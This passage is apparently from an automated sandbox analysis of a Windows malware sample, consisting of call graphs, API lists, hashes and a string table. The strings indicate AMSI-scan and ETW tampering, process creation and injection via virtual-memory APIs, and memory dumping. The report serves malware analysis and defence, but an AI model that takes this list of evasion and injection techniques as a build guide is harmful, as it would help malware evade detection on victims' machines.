31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 * 16 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31a46d4 * 2 call 31b89d0 call 31b7c10 call 31b8338 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 ExitProcess 4689->4780 4779->4780 4789 31c953f-31c9812 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31bf094 call 31a4860 call 31a49a0 call 31a46d4 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a7e5c 4779->4789 5045 31c9aef-31c9cf0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a49f8 call 31b8d70 4789->5045 5046 31c9818-31c9aea call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31be358 call 31a4530 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4de0 * 2 call 31a4764 call 31bdc8c 4789->5046 4898 31c887b-31c887e 4798->4898 4899 31c8880-31c8ba0 call 31a49f8 call 31bde50 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31bd164 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 4798->4899 4799->4798 4898->4899 5216 31c8bb9-31c939c call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 ResumeThread call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 CloseHandle call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31b8080 call 31b894c * 6 CloseHandle call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 4899->5216 5217 31c8ba2-31c8bb4 call 31b8730 4899->5217 5045->4780 5046->5045 5216->4689 5217->5216
                                                                                              APIs
                                                                                                • Part of subcall function 031B89D0: FreeLibrary.KERNEL32(03227388,00000000,00000000,00000000,00000000,0322738C,Function_0000562C,00000004,0322739C,0322738C,05F5E103,00000040,032273A0,03227388,00000000,00000000), ref: 031B8AAA
                                                                                              • CreateProcessAsUserW.ADVAPI32(0331B7DC,00000000,00000000,00000000,00000000,00000000,00000004,00000000,00000000,0331B7E0,0331B824,OpenSession,03223160,031CB7B8,UacScan,03223160), ref: 031C86E9
                                                                                              • ResumeThread.KERNEL32(0331B828,ScanBuffer,03223160,031CB7B8,OpenSession,03223160,031CB7B8,UacScan,03223160,031CB7B8,ScanBuffer,03223160,031CB7B8,OpenSession,03223160,031CB7B8), ref: 031C8D33
                                                                                              • CloseHandle.KERNEL32(0331B824,ScanBuffer,03223160,031CB7B8,OpenSession,03223160,031CB7B8,UacScan,03223160,031CB7B8,0331B828,ScanBuffer,03223160,031CB7B8,OpenSession,03223160), ref: 031C8EB2
                                                                                                • Part of subcall function 031B894C: LoadLibraryW.KERNEL32(?,?), ref: 031B8960
                                                                                                • Part of subcall function 031B894C: GetProcAddress.KERNEL32(03227394,BCryptVerifySignature), ref: 031B897A
                                                                                                • Part of subcall function 031B894C: FreeLibrary.KERNEL32(03227394,03227394,BCryptVerifySignature,bcrypt,?,032273D4,00000000,032273A8,031BA587,ScanString,032273A8,031BA93C,ScanBuffer,032273A8,031BA93C,Initialize), ref: 031B89B6
                                                                                              • CloseHandle.KERNEL32(0331B824,0331B824,ScanBuffer,03223160,031CB7B8,UacInitialize,03223160,031CB7B8,ScanBuffer,03223160,031CB7B8,OpenSession,03223160,031CB7B8,UacScan,03223160), ref: 031C92A4
                                                                                                • Part of subcall function 031BDC8C: RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 031BDCCB
                                                                                                • Part of subcall function 031BDC8C: NtWriteFile.NTDLL(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000), ref: 031BDD32
                                                                                                • Part of subcall function 031BDC8C: NtClose.NTDLL(?), ref: 031BDD3B
                                                                                                • Part of subcall function 031B8338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,031B83C2), ref: 031B83A4
                                                                                              • ExitProcess.KERNEL32(00000000,OpenSession,03223160,031CB7B8,ScanBuffer,03223160,031CB7B8,Initialize,03223160,031CB7B8,00000000,00000000,00000000,ScanString,03223160,031CB7B8), ref: 031CB2FA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.1831975910.00000000031A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 031A1000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_31a1000_Cllyjbrx.jbxd
                                                                                              Similarity
                                                                                              • API ID: CloseLibrary$FreeHandlePathProcess$AddressCacheCreateExitFileFlushInstructionLoadNameName_ProcResumeThreadUserWrite
                                                                                              • String ID: Advapi$BCryptVerifySignature$C:\Windows\System32\$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPVerifyIndirectData$DllGetClassObject$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FlushInstructionCache$GetProcessMemoryInfo$I_QueryTagInformation$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$UacInitialize$UacScan$VirtualAlloc$VirtualAllocEx$VirtualProtect$WriteVirtualMemory$advapi32$bcrypt$dbgcore$endpointdlp$kernel32$mssip32$ntdll$psapi$psapi$spp$sppc$sppwmi$tquery
                                                                                              • API String ID: 376050052-1225450241
                                                                                              • Opcode ID: 4b1941ed4f30fc688ce9ad0110bfb61174c660eccb8cad3141ef32b752725695
                                                                                              • Instruction ID: c7edaf8d9be8b6edaf80435e6f2fcdae6608fd446a0ba1b6aa92468e26efb641
                                                                                              • Opcode Fuzzy Hash: 4b1941ed4f30fc688ce9ad0110bfb61174c660eccb8cad3141ef32b752725695
                                                                                              • Instruction Fuzzy Hash: 1F43EA3DA1865C9FCB10EB69DC819CE73B9AB9C702F1080A5A108EF754DF74AE958F41
                                                                                              Function 031C3E11 Relevance: 41.8, APIs: 3, Strings: 23, Instructions: 2805sleepCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 7737 31c3e11-31c5525 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31bf094 call 31a4860 call 31a49a0 call 31a46d4 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31be358 call 31a4de0 call 31a4764 call 31a4de0 call 31bdc8c Sleep call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31b88b8 call 31a49a0 call 31a3244 call 31be678 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 Sleep call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a46d4 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a47ec call 31a49a0 call 31b7c10 call 31b894c call 31a4860 call 31a49a0 call 31a47ec call 31a49a0 call 31b7c10 call 31b894c call 31b88b8 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31be358 call 31a4de0 call 31a4764 call 31a4de0 call 31bdc8c call 31b88b8 call 31bf094 call 31a47ec call 31a49a0 call 31a46d4 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31b88b8 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31b88b8 call 31be358 call 31a4de0 call 31a4764 call 31a4de0 call 31bdc8c call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31b88b8 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 Sleep call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a49a0 call 31a4d74 call 31bdc04 call 31a49a0 call 31a4d74 call 31bdc04 call 31a49a0 call 31a4d74 call 31bdc04 call 31a49a0 call 31a4d74 call 31bdc04 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4d74 call 31bdc04 call 31a4d74 call 31bdc04 call 31a4d74 8422 31c5530-31c5d82 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31be398 call 31a4530 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a7acc call 31bf16c call 31a4530 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31bf094 call 31bf108 call 31a4530 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a48ec 7737->8422 8423 31c552b call 31bdc04 7737->8423 8666 31c7568-31c77e3 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a48ec 8422->8666 8667 31c5d88-31c5dcd call 31a4860 call 31a49a0 call 31a46d4 call 31a7e5c 8422->8667 8423->8422 8812 31c8318-31c8517 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a48ec 8666->8812 8813 31c77e9-31c7e3b call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a47ec call 31a49a0 call 31b85bc call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a49a0 call 31a46d4 call 31badf8 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a36d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 8666->8813 8667->8666 8685 31c5dd3-31c66e5 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31b85bc call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a48ec 8667->8685 9646 31c6949-31c706c call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a36d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a2f08 call 31a7990 call 31a47ec call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a2f08 call 31a7990 call 31a47ec call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a3700 8685->9646 9647 31c66eb-31c6944 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a4d74 call 31a4de0 call 31a4764 call 31bdc8c 8685->9647 8989 31c851d-31c86f0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a47ec call 31a49a0 call 31a4d74 call 31a4df0 CreateProcessAsUserW 8812->8989 8990 31c93a1-31c9524 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a48ec 8812->8990 9579 31c7e3d-31c7e40 8813->9579 9580 31c7e42-31c8120 call 31b5aec call 31a4bcc call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a49f8 call 31b7e50 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31bb118 call 31a3700 8813->9580 9201 31c876e-31c8879 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 8989->9201 9202 31c86f2-31c8769 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 8989->9202 9172 31c952a-31c9539 call 31a48ec 8990->9172 9173 31c9cf5-31cb2fa call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 31a46d4 call 31b89d0 call 31a4860 call 31a49a0 call 31a46d4 call 31a47ec call 31a49a0 call 